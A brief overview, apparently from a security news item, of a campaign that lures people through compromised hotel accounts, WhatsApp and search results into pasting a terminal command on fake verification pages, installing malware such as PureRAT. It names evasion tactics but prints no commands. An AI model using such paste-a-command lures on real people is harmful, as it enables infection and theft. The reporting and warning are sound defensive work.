Overview
- Attackers deliver links via compromised hotel and Booking.com accounts, WhatsApp messages, and top Google search results to build trust before directing targets to fake verification pages.
- Victims are instructed to copy and paste a single command into a terminal or command prompt, which silently fetches and installs malware without obvious signs of compromise.
- Campaign pages detect the visitor’s device and serve tailored payloads for Windows and macOS, with one documented Windows case installing the PureRAT malware behind a fake Cloudflare CAPTCHA.
- Many payloads rely on living-off-the-land binaries and base64-encoded commands pasted within the browser sandbox, limiting visibility for security tools and reducing on-disk traces.
- Microsoft Defender and similar tools can sometimes stop these attacks but are not foolproof, prompting experts to advise users never to paste commands from unfamiliar sites and to verify suspicious messages directly.